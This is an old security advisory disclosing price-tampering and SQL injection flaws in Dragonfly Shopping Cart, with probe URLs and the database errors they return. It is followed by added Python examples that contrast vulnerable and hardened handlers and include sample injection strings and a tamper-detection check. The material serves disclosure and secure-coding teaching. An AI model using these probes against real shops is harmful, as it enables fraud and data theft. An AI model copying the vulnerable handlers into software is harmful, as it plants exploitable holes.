Dragonfly Shopping Cart Multiple vulnerabilities

dcrab_at_hackerscenter.com
Date: 07/12/05

    Date: 12 Jul 2005 08:53:52 -0000
    To: bugtraq@securityfocus.com
    
    
    Dcrab's Security Advisory
    http://icis.digitalparadox.org/~dcrab
    http://www.hackerscenter.com/

    Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

    Severity: High
    Title: Dragonfly Shopping Cart Multiple vulnerabilities
    Date: 11/07/2005

    Vendor: DragonFly Shopping Cart
    Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
    Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modification of prices, along with SQL injection vulnerabilities.

    Proof of Concept Exploits:

    Hidden Price Value Vulnerability
    You can modify these fields to change the price of the product and thus purchase the biggest and most expensive products for the cheapest possible prices, or even for nothing.
    /demo/dc_Categorieslist.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">

    /demo/dc_Categoriesview.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    /demo/dc_productslist.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    /demo/dc_productslist_Clearance.asp
    HPVV

    <input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">

    There are also many other hidden fields, like IP address etc., which can be used to make the attack "technically" more anonymous, though any normal logging system would catch you ;).

    SQL Injections

    /demo/dc_Categoriesview.asp??key='&RecPerPage=5

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_Categoriesview.asp, line 1054

    /demo/dc_Categoriesview.asp?key=%26dir%26
    Microsoft JET Database Engine error '80040e14'

    Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.

    /demo/dc_Categoriesview.asp, line 1054

    /demo/dc_productslist_Clearance.asp

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

    /demo/dc_productslist_Clearance.asp, line 292

    /demo/dc_productslist_Clearance.asp?cmd=%27

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.

    /demo/dc_productslist_Clearance.asp, line 292

    /demo/ratings.asp??PID='

    Microsoft JET Database Engine error '80040e14'

    Syntax error (missing operator) in query expression '[ProductKey]=''.

    /demo/ratings.asp, line 68

    /demo/dc_Productsview.asp

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_Productsview.asp, line 931

    /demo/dc_forum_Postslist.asp?start='

    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'nTotalRecs'

    /demo/dc_forum_Postslist.asp, line 319

    /demo/dc_forum_Postslist.asp?key_m='

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    /demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    /demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

    Microsoft JET Database Engine error '80040e07'

    Data type mismatch in criteria expression.

    /demo/dc_forum_Postslist.asp, line 200

    Author:
    These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon-to-come-out book on secure coding with PHP.
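The "Hidden Price Value Vulnerability" above, as an added example that is not code from the advisory or from Dragonfly Shopping Cart. It contrasts a cart handler that reads the unit price back out of the submitted form with one that accepts only a product key and looks the price up server-side, plus a detection hook for a cart that still carries the field. Only the field name x_DragonflyCartProductPrice comes from the advisory; the product-key and quantity field names, the catalogue and the form contents are assumptions constructed for the example.

```python
"""Added example, not code from the advisory or from Dragonfly Shopping Cart.
Only the field name x_DragonflyCartProductPrice is taken from the advisory;
x_DragonflyCartProductKey, x_DragonflyCartQty, the catalogue and the sample
forms are assumptions constructed for this example."""
from decimal import Decimal, InvalidOperation, ROUND_HALF_UP

# Constructed catalogue: in a real cart this is the product table.
CATALOGUE = {
    "1": Decimal("15.49"),
    "2": Decimal("1299.00"),
}
CENT = Decimal("0.01")


def _money(amount):
    """Round to cents the way a till would."""
    return amount.quantize(CENT, rounding=ROUND_HALF_UP)


def cart_total_vulnerable(form):
    """Trusts the hidden price field: whoever submits the form sets the price."""
    qty = int(form.get("x_DragonflyCartQty", "1"))
    price = Decimal(form["x_DragonflyCartProductPrice"])  # attacker-controlled
    return _money(price * qty)


def cart_total_hardened(form):
    """Ignores any submitted price: the catalogue is the only price source, and
    the quantity is range-checked so a negative quantity cannot become a credit."""
    key = form.get("x_DragonflyCartProductKey")
    if key not in CATALOGUE:
        raise ValueError("unknown product key")
    try:
        qty = int(form.get("x_DragonflyCartQty", "1"))
    except ValueError:
        raise ValueError("quantity is not an integer")
    if not 1 <= qty <= 99:
        raise ValueError("quantity out of range")
    return _money(CATALOGUE[key] * qty)


def price_tampered(form):
    """Detection hook for a cart that still ships the hidden field: True when the
    submitted price is missing, malformed, or differs from the catalogue price."""
    key = form.get("x_DragonflyCartProductKey")
    if key not in CATALOGUE:
        return False  # an unknown product is rejected elsewhere; nothing to compare
    try:
        submitted = Decimal(form.get("x_DragonflyCartProductPrice", ""))
    except InvalidOperation:
        return True
    return submitted != CATALOGUE[key]


if __name__ == "__main__":
    # Constructed form submissions: an honest one and two tampered copies.
    honest = {"x_DragonflyCartProductKey": "2",
              "x_DragonflyCartProductPrice": "1299.00",
              "x_DragonflyCartQty": "1"}
    zeroed = dict(honest, x_DragonflyCartProductPrice="0")
    negative = dict(honest, x_DragonflyCartQty="-1")
    print(cart_total_vulnerable(zeroed))    # 0.00
    print(cart_total_vulnerable(negative))  # -1299.00
    print(cart_total_hardened(zeroed))      # 1299.00
    print(price_tampered(zeroed))           # True
```

The hardened handler deliberately has no code path that reads the price field at all; logging the mismatch from price_tampered is useful for spotting probing, but the order total must never depend on it.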
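The SQL injection section above, as an added example that is not code from the advisory or from Dragonfly Shopping Cart. The ASP pages themselves are not on the page, but the Jet error text reveals two query shapes: a numeric comparison where the parameter is pasted in unquoted ('[CategoryKey] = &dir&') and a LIKE search inside a quoted literal ("[ProductName] LIKE '%1%'"). Both are rebuilt below in Python on SQLite, which stands in for Jet as an assumption; table names, columns and rows are constructed for the example.

```python
"""Added example, not code from the advisory or from Dragonfly Shopping Cart.
SQLite stands in for the Jet database (an assumption); tables, columns and
rows are constructed for this example. Only the two query shapes are taken
from the error messages quoted in the advisory."""
import sqlite3


def make_db():
    """Constructed sample data: one hidden category and one inactive product."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Categories "
                 "(CategoryKey INTEGER, CategoryName TEXT, Hidden INTEGER)")
    conn.executemany("INSERT INTO Categories VALUES (?, ?, ?)",
                     [(1, "Books", 0), (2, "Electronics", 0), (3, "Unreleased", 1)])
    conn.execute("CREATE TABLE Products "
                 "(ProductKey INTEGER, ProductName TEXT, ProductActive TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)",
                     [(10, "Paperback", "show"), (11, "Hardback", "show"),
                      (12, "Prototype", "hide")])
    return conn


def category_view_vulnerable(conn, key):
    """Unquoted numeric context: the request parameter becomes SQL text, so
    '1 OR Hidden = 1' turns into 'Hidden = 0 AND CategoryKey = 1 OR Hidden = 1'."""
    sql = "SELECT CategoryName FROM Categories WHERE Hidden = 0 AND CategoryKey = " + key
    return [row[0] for row in conn.execute(sql)]


def category_view_hardened(conn, key):
    """Check the type before the database sees the value (Jet's 'Data type
    mismatch' fired inside the query and leaked the page's line number), then
    bind it as a parameter."""
    try:
        key_int = int(key)
    except ValueError:
        return []
    sql = "SELECT CategoryName FROM Categories WHERE Hidden = 0 AND CategoryKey = ?"
    return [row[0] for row in conn.execute(sql, (key_int,))]


def product_search_vulnerable(conn, term):
    """Quoted string context inside a LIKE pattern, as in the clearance page's
    query; a quote in the term closes the literal and the rest is SQL."""
    sql = ("SELECT ProductName FROM Products WHERE ProductActive = 'show' "
           "AND ProductName LIKE '%" + term + "%'")
    return [row[0] for row in conn.execute(sql)]


def product_search_hardened(conn, term):
    """The wildcard wrapping happens in Python and the whole pattern is one
    bound value, so quotes in the term are just characters to match."""
    sql = ("SELECT ProductName FROM Products WHERE ProductActive = 'show' "
           "AND ProductName LIKE ?")
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


if __name__ == "__main__":
    db = make_db()
    # Numeric injection: the hidden category comes back with the real one.
    print(category_view_vulnerable(db, "1 OR Hidden = 1"))   # ['Books', 'Unreleased']
    print(category_view_hardened(db, "1 OR Hidden = 1"))     # []
    # String injection: "%' OR '%'='" closes the LIKE literal and appends an
    # always-true comparison, so the inactive product leaks too.
    print(product_search_vulnerable(db, "%' OR '%'='"))      # ['Paperback', 'Hardback', 'Prototype']
    print(product_search_hardened(db, "%' OR '%'='"))        # []
    print(product_search_hardened(db, "back"))               # ['Paperback', 'Hardback']
```

The same separation of query text from data is what ADODB Command objects with Parameters give classic ASP; the verbose Jet errors in the advisory are a second, independent problem (custom error pages, not detailed engine messages, belong on a production site), but fixing the error pages alone would only hide the injection, not remove it.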

